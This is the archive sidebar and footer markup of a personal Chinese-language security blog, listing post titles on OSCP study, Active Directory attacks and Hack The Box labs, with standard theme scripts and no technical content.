            <a class="archive-post-title" href="/2025/09/20/OSCP/%E7%A5%A8%E6%8D%AE%E6%94%BB%E5%87%BB/">票据攻击</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">03/09</span>
            <a class="archive-post-title" href="/2025/03/09/OSCP/LM%20Hash%20%E5%92%8C%20NT%20Hash/">LM Hash 和 NT Hash</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">03/08</span>
            <a class="archive-post-title" href="/2025/03/08/OSCP/DCSync%20%E6%94%BB%E5%87%BB/">DCSync 攻击</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">03/08</span>
            <a class="archive-post-title" href="/2025/03/08/OSCP/Pass-the-Ticket%20(PTT)%20%E7%9A%84%E5%90%AB%E4%B9%89/">Pass-the-Ticket (PTT) 的含义</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">03/08</span>
            <a class="archive-post-title" href="/2025/03/08/OSCP/enum4linux/">enum4linux</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">03/08</span>
            <a class="archive-post-title" href="/2025/03/08/OSCP/getST.py/">getST.py</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">03/08</span>
            <a class="archive-post-title" href="/2025/03/08/OSCP/LDAP/">LDAP</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">03/08</span>
            <a class="archive-post-title" href="/2025/03/08/OSCP/Mimikatz/">Mimikatz</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">03/08</span>
            <a class="archive-post-title" href="/2025/03/08/OSCP/ldapsearch/">ldapsearch</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">03/08</span>
            <a class="archive-post-title" href="/2025/03/08/OSCP/ligolg-ng/">ligolg-ng</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">03/08</span>
            <a class="archive-post-title" href="/2025/03/08/OSCP/kekeo-%E6%9C%AA%E5%AE%8C%E6%88%90/">kekeo-未完成</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">03/03</span>
            <a class="archive-post-title" href="/2025/03/03/OSCP/Kerberos%E8%AE%A4%E8%AF%81%E8%BF%87%E7%A8%8B/">Kerberos认证过程</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">01/08</span>
            <a class="archive-post-title" href="/2025/01/08/OSCP/AD%E7%AE%80%E4%BB%8B%E5%92%8C%E6%9E%9A%E4%B8%BE%20%E8%AF%BE%E6%9C%AC/">AD简介和枚举 课本</a>
        </li>
                </ul>
            <div class="archive-year"> 2024 </div>
            <ul class="year-list">
        <li class="archive-post-item">
            <span class="archive-post-date">12/31</span>
            <a class="archive-post-title" href="/2024/12/31/OSCP/NTLM%E5%8D%8F%E8%AE%AE/">NTLM协议</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">11/10</span>
            <a class="archive-post-title" href="/2024/11/10/brainfuck/">HTB-Labs(brainfuck)</a>
        </li>
                </ul>
            <div class="archive-year"> 2023 </div>
            <ul class="year-list">
        <li class="archive-post-item">
            <span class="archive-post-date">11/04</span>
            <a class="archive-post-title" href="/2023/11/04/cronos/">HTB-Labs(cronos)</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">10/24</span>
            <a class="archive-post-title" href="/2023/10/24/Vulhub/MrRootMD/">HTB-Labs(MrRootMD)</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">10/18</span>
            <a class="archive-post-title" href="/2023/10/18/beep/">HTB-Labs(Beep)</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">10/18</span>
            <a class="archive-post-title" href="/2023/10/18/nibbles/">HTB-Labs(nibblers)</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">10/18</span>
            <a class="archive-post-title" href="/2023/10/18/nibber/">HTB-Labs(nibber)</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">08/31</span>
            <a class="archive-post-title" href="/2023/08/31/Shocker/">HTB-Labs(Shocker)</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">08/17</span>
            <a class="archive-post-title" href="/2023/08/17/unified/">HTB-Labs(unified)</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">08/16</span>
            <a class="archive-post-title" href="/2023/08/16/Lame/">HTB-Labs(Lame)</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">08/09</span>
            <a class="archive-post-title" href="/2023/08/09/Vaccine/">HTB-Labs(Vaccine)</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">08/03</span>
            <a class="archive-post-title" href="/2023/08/03/PWN/%E5%82%A8%E5%AD%98%E5%8D%95%E5%85%83/">二进制存储单元</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">08/03</span>
            <a class="archive-post-title" href="/2023/08/03/PWN/%E4%B8%A4%E4%B8%AA%E5%85%B3%E9%94%AE%E7%9A%84%E5%AF%84%E5%AD%98%E5%99%A8/">两个关键的寄存器</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/31</span>
            <a class="archive-post-title" href="/2023/07/31/PWN/%E6%A0%88%E5%92%8C%E5%A0%86%E7%9A%84%E5%8C%BA%E5%88%AB/">堆和栈的区别</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/31</span>
            <a class="archive-post-title" href="/2023/07/31/PWN/%E6%A0%88%E4%BB%8B%E7%BB%8D/">栈介绍</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/31</span>
            <a class="archive-post-title" href="/2023/07/31/PWN/%E6%A0%88%E5%92%8C%E6%A0%88%E6%93%8D%E4%BD%9C%E7%9A%84%E5%AE%9E%E7%8E%B0/">堆栈操作的实现</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/31</span>
            <a class="archive-post-title" href="/2023/07/31/PWN/%E6%B1%87%E7%BC%96%E6%8C%87%E4%BB%A4%E5%85%A5%E9%97%A8mov%E5%92%8Cadd/">汇编指令入门mov和add</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/31</span>
            <a class="archive-post-title" href="/2023/07/31/PWN/%E6%B1%87%E7%BC%96%E8%AF%AD%E8%A8%80%20%E5%9F%BA%E4%BA%8Ex86%E5%A4%84%E7%90%86%E5%99%A8%20%E7%AC%AC7%E7%89%88%20-%20Nya/">汇编语言 基于x86处理器</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/28</span>
            <a class="archive-post-title" href="/2023/07/28/Archetype/">HTB-Labs(Archetype)</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/28</span>
            <a class="archive-post-title" href="/2023/07/28/Oopsie/">HTB-Labs(Oopsie)</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/17</span>
            <a class="archive-post-title" href="/2023/07/17/Vulhub/lin.security/">HTB-Labs(lin.security)</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">06/05</span>
            <a class="archive-post-title" href="/2023/06/05/Three/">HTB-Labs(Three)</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">06/02</span>
            <a class="archive-post-title" href="/2023/06/02/Responder/">HTB-Labs(Resonder)</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">05/24</span>
            <a class="archive-post-title" href="/2023/05/24/Vulhub/SkyTower/">HTB-Labs(SkyTower)</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">05/23</span>
            <a class="archive-post-title" href="/2023/05/23/Vulhub/pWnOS%20v2.0/">HTB-Labs(pWnOS)</a>
        </li>
                </ul>
            <div class="archive-year"> 2022 </div>
            <ul class="year-list">
        <li class="archive-post-item">
            <span class="archive-post-date">12/23</span>
            <a class="archive-post-title" href="/2022/12/23/Vulhub/Kioptix%20Level%201/">HTB-Labs(Kioptix Level 1)</a>
        </li>
            </ul>
    </div>
</div>

        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
            <span class="sidebar-tag-name" data-tags="HTB">
                <span class="iconfont-archer">&#xe606;</span>
                HTB
            </span>
            <span class="sidebar-tag-name" data-tags="Lab">
                <span class="iconfont-archer">&#xe606;</span>
                Lab
            </span>
            <span class="sidebar-tag-name" data-tags="HtbStartPorint">
                <span class="iconfont-archer">&#xe606;</span>
                HtbStartPorint
            </span>
            <span class="sidebar-tag-name" data-tags="OSCP">
                <span class="iconfont-archer">&#xe606;</span>
                OSCP
            </span>
            <span class="sidebar-tag-name" data-tags="域控">
                <span class="iconfont-archer">&#xe606;</span>
                域控
            </span>
            <span class="sidebar-tag-name" data-tags="汇编">
                <span class="iconfont-archer">&#xe606;</span>
                汇编
            </span>
            <span class="sidebar-tag-name" data-tags="PWN">
                <span class="iconfont-archer">&#xe606;</span>
                PWN
            </span>
            <span class="sidebar-tag-name" data-tags="Vulhub">
                <span class="iconfont-archer">&#xe606;</span>
                Vulhub
            </span>
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
        缺失模块，请参考主题文档进行安装配置：https://github.com/fi3ework/hexo-theme-archer#%E5%AE%89%E8%A3%85%E4%B8%BB%E9%A2%98
    </div> 
    <div class="sidebar-tags-list"></div>
</div>

        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>

    </div>
</div>

        <!-- site-meta -->
        <script>
    var siteMetaRoot = "/"
    if (siteMetaRoot === "undefined") {
        siteMetaRoot = '/'
    }
    var siteMeta = {
        url: "https://DarkAmP.github.io",
        root: siteMetaRoot,
        author: "DarkAP"
    }
</script>

        <!-- import experimental options here -->
        <!-- Custom Font -->

        <!-- main func -->
        <script src="/scripts/main.js"></script>
        <!-- fancybox -->
        <script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0.36/dist/fancybox/fancybox.umd.js" onload="window.Fancybox.bind('[data-fancybox]')" defer></script>
        <!-- algolia -->
        <!-- busuanzi -->
            <script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script>
        <!-- async load share.js -->
            <script src="/scripts/share.js" async></script>
        <!-- mermaid -->
    </body>
</html>
